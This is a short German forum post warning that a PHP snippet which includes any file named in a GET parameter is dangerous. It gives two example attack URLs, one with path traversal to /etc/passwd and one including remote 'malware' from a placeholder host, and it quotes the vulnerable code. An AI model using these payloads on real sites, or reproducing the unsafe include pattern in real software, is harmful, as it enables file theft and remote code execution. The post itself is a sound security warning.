Tom: include ist gefährlich

Beitrag lesen

Hello,

>http://www.domain.tld/?include=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Nur so als Beispiel...
Oder:

>http://www.domain.tld/?include=http:%2F%2Fminisaft.tld%2Fschadsoftware%2Fvirus.txt

<?
if ($_GET["include"]!="") {
   if (file_exists($_GET["include"])) {
      include($_GET["include"]);
   } else {
      echo "Die Page ist noch im Aufbau wir Bittem um verständnis.";
   }
}
?>

Oder sehe ich das verkehrt?

Harzliche Grüße aus http://www.annerschbarrich.de

Tom

--
Fortschritt entsteht nur durch die Auseinandersetzung der Kreativen
Nur selber lernen macht schlau